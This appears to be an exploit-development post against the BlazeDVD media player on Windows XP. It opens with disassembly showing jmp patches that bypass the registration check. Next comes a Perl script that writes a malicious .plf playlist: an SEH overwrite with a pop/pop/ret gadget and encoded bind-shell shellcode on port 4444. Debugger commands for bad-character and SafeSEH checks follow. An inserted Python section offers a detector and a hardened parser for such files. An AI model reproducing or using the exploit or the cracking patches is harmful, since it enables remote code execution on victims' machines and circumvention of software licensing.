Experimenting with an arbitrarily downloaded BlazeDVD build.
Target: Windows XP SP3, no DEP.
First, cracking the program:
Very simple: search for the strings and patch a few jmps, and the check is bypassed.
6030324B  . /E9 35030000    jmp Configur.60303585
60303250  > |68 C0003460    push Configur.603400C0        ; IsRegistered1
60303255  . |57             push edi
60303256  . |E8 15570100    call Configur.60318970
6030325B  . |83C4 08        add esp,0x8
6030325E  . |85C0           test eax,eax
60303260    |E9 93000000    jmp Configur.603032F8         //jmp

603033A1  > \68 A87A3460    push Configur.60347AA8        ; IsRegistered3
603033A6  .  57             push edi
603033A7  .  E8 C4550100    call Configur.60318970
603033AC  .  83C4 08        add esp,0x8
603033AF  .  85C0           test eax,eax
603033B1     E9 94000000    jmp Configur.6030344A         //jmp
603033B6     90             nop

6030344A  > \68 947A3460    push Configur.60347A94        ; IsPlaybackTimeOut
6030344F  .  57             push edi
60303450  .  E8 1B550100    call Configur.60318970
60303455  .  83C4 08        add esp,0x8
60303458  .  85C0           test eax,eax
6030345A     EB 1B          jmp XConfigur.60303477

60303477  > \57             push edi
60303478  .  8D4E E8        lea ecx,dword ptr ds:[esi-0x18]
6030347B  .  E8 E0280000    call Configur.60305D60
60303480  .  8BD8           mov ebx,eax
60303482  .  83FB FF        cmp ebx,-0x1
60303485     EB 07          jmp XConfigur.6030348E
60303487  .  33C0           xor eax,eax
60303489  .  E9 F7000000    jmp Configur.60303585
6030348E  >  68 E0773460    push Configur.603477E0        ; AutoResumeMode
60303493  .  57             push edi
Perl script:

my $file = "test.plf";

# Candidate pop/pop/ret gadgets found in the module:
#0x1000ecfa pop ebx; pop ebp; ret
#0x1000ef4a pop esi; pop ebp; ret
#0x1000f00e pop edi; pop esi; ret
#0x100101e7 pop esi; pop ecx; ret
#0x1001028f pop esi; pop ebx; retn 0x0010
#0x100104d7 pop ebx; pop ecx; retn 0x000c
#0x10010511 pop esi; pop ebx; retn 0x000c
#0x1001058a pop ebp; pop ebx; retn 0x0010
#0x10010595 pop ebp; pop ebx; retn 0x0010
#0x1001059f pop ebp; pop ebx; retn 0x0010
#0x100105f1 pop esi; pop ebx; retn 0x000c

my $junk    = "\xcc"x608;                 # filler up to the SEH record
my $nseh    = "\xeb\x1e\x90\x90";         # nSEH: short jmp forward over the record
my $seh     = pack('V',0x10010511);       # SEH: pop esi; pop ebx; retn 0x000c
my $prejunk = "\x90"x30;                  # NOP sled in front of the shellcode

# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=x.x.x.x, EXITFUNC=seh,
#\x1a
my $shellcode =
"\xD9\xEE".                         # fldz
"\xD9\x74\x24\xF4".                 # fnstenv [esp-0xc]  (GetPC)
"\x58".                             # pop eax
"\x83\xC0\x1b".                     # add eax,0x1b       (start of encoded body)
"\x33\xC9".                         # xor ecx,ecx
"\x8A\x1C\x08" .                    # mov bl,[eax+ecx]
"\x80\xF3\x11".                     # xor bl,0x11
"\x88\x1C\x08".                     # mov [eax+ecx],bl
"\x41" .                            # inc ecx
"\x80\xFB\x90".                     # cmp bl,0x90        (terminator)
"\x75\xF1".                         # jnz loop
"\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d".
"\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42".
"\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a".
"\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84".
"\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48".
"\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b".
"\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64".
"\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12".
"\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca".
"\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41".
"\x42\xee\x46\xed\x42\xee\x46\xe9\x81";

my $payload = $junk.$nseh.$seh.$prejunk.$shellcode;

open(my $FILE, '>', $file) or die "cannot open $file: $!";
binmode($FILE);                           # write raw bytes, no newline translation
print $FILE $payload;
close($FILE);
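As an added example from the defender's side (this is not code from the original post and not BlazeDVD's own code): a Python triage script that scans a playlist file for the traces the payload layout above leaves behind, plus a strict reader of the kind the vulnerable parser lacked. It assumes a .plf is a newline-separated list of media paths and that 260 bytes (MAX_PATH) is a reasonable upper bound for one entry; both sample inputs are constructed here. The suspicious sample reuses the nSEH bytes and the SEH pointer 0x10010511 from the post's script, with an ASCII placeholder where the post has shellcode, so the detector can be exercised without a real payload.

```python
import re
import struct

# --- Constructed sample inputs (assumption: .plf = newline-separated media paths) ---
BENIGN_PLF = b"C:\\Videos\\intro.mpg\r\nC:\\Videos\\main.mpg\r\n"

# Same layout as the post's payload (filler, nSEH short jmp, SEH pointer, NOP sled,
# FPU GetPC stub) with an ASCII placeholder standing in for the encoded shellcode.
SUSPICIOUS_PLF = (
    b"\xcc" * 608                       # filler up to the SEH record
    + b"\xeb\x1e\x90\x90"               # nSEH: short jmp +0x1e, padded
    + struct.pack("<I", 0x10010511)     # SEH: gadget address from the post
    + b"\x90" * 30                      # NOP sled
    + b"\xd9\xee\xd9\x74\x24\xf4\x58"   # fldz; fnstenv [esp-0xc]; pop eax
    + b"PLACEHOLDER-BODY" * 4           # placeholder, not shellcode
)

MAX_ENTRY_LEN = 260  # MAX_PATH; assumed bound for one playlist entry

# x86 FPU "GetPC" idiom: a constant-load FPU instruction (fld1..fldz, D9 E8-EE)
# immediately followed by fnstenv [esp-0xc] (D9 74 24 F4); typical of decoder stubs.
FPU_GETPC = re.compile(rb"\xd9[\xe8-\xee]\xd9\x74\x24\xf4")

# nSEH/SEH pair as laid out in an SEH overwrite: short forward jmp (EB xx) plus two
# pad bytes, then a 4-byte little-endian pointer (checked against user image space).
SEH_PAIR = re.compile(rb"\xeb[\x00-\x7f]..(....)", re.DOTALL)


def is_printable(b: int) -> bool:
    return 0x20 <= b <= 0x7E or b in (0x09, 0x0A, 0x0D)


def nonprintable_ratio(data: bytes) -> float:
    if not data:
        return 0.0
    return sum(1 for b in data if not is_printable(b)) / len(data)


def longest_byte_run(data: bytes):
    """Return (byte_value, run_length) for the longest run of one repeated byte."""
    best = (None, 0)
    i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i > best[1]:
            best = (data[i], j - i)
        i = j
    return best


def find_seh_pairs(data: bytes):
    """(offset, pointer) for jmp-short + pointer pairs whose pointer looks like a 32-bit image address."""
    hits = []
    for m in SEH_PAIR.finditer(data):
        addr = struct.unpack("<I", m.group(1))[0]
        if 0x00400000 <= addr < 0x80000000:
            hits.append((m.start(), addr))
    return hits


def find_getpc_stubs(data: bytes):
    return [m.start() for m in FPU_GETPC.finditer(data)]


def scan_playlist(data: bytes) -> dict:
    """Collect overflow/shellcode indicators; flag as suspicious when two or more fire."""
    run_byte, run_len = longest_byte_run(data)
    longest_line = max((len(line) for line in data.split(b"\n")), default=0)
    ind = {
        "nonprintable_ratio": nonprintable_ratio(data),
        "longest_run": (run_byte, run_len),
        "longest_line": longest_line,
        "seh_pairs": find_seh_pairs(data),
        "getpc_stubs": find_getpc_stubs(data),
    }
    score = sum([
        ind["nonprintable_ratio"] > 0.3,
        run_len >= 128,
        longest_line > MAX_ENTRY_LEN,
        bool(ind["seh_pairs"]),
        bool(ind["getpc_stubs"]),
    ])
    ind["suspicious"] = score >= 2
    return ind


def parse_playlist_strict(data: bytes, max_entry_len: int = MAX_ENTRY_LEN):
    """Hardened reader: reject overlong or non-printable entries before they reach any fixed buffer."""
    entries = []
    for lineno, raw in enumerate(data.split(b"\n"), 1):
        line = raw.rstrip(b"\r")
        if not line:
            continue
        if len(line) > max_entry_len:
            raise ValueError(f"line {lineno}: entry of {len(line)} bytes exceeds {max_entry_len}")
        if any(not (0x20 <= b <= 0x7E) for b in line):
            raise ValueError(f"line {lineno}: non-printable bytes in entry")
        entries.append(line.decode("ascii"))
    return entries


if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_PLF), ("suspicious", SUSPICIOUS_PLF)):
        print(name, scan_playlist(blob))
```

The scan is a heuristic for triage, not a parser: any one indicator (a long run of one byte, a non-text file, an EB-xx followed by a plausible pointer, the fldz/fnstenv stub) can occur in benign data, which is why the verdict needs two of them. The strict reader is the actual fix for this class of bug: bounding entry length and character set before copying into anything removes the overflow regardless of which gadget the file carries.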
Next, checking for possible bad characters:
!load byakugan
!jutsu memDiff file 302 c:\sploits\shell.txt 0x0012f5de
Arguments: the shellcode length, the file containing the shellcode, and the start address in memory.
The differing bytes are shown in bold.
I changed every "\xee" in the shellcode above to "\xcc" and checked as follows:
!load byakugan
!jutsu identBuf file myShell c:\shell.txt
!jutsu identBuf msfpattern myBuffer 608
!jutsu listBuf
!searchcode jmp esp   also shows the module attributes; needed when looking for specific code under DEP.
!aslrdynamicbase      lists modules that are randomized (ASLR dynamic base).
!pvefindaddr j        jmp/call and ret combinations.
  jseh                especially useful when bypassing SafeSEH protection.
  nosafeseh           modules not protected by SafeSEH.
!packets              used to capture wireless packets: open a web page, attach the debugger, run !packets, let the process continue, then check the Captured Packets window.
!safeseh              lists the executable modules and indicates whether each is SafeSEH-protected.
!mona bytearray       generates a 00-ff byte array for detecting bad characters.
Finding the shellcode location: !mona cmp -f c:\1\egg1.bin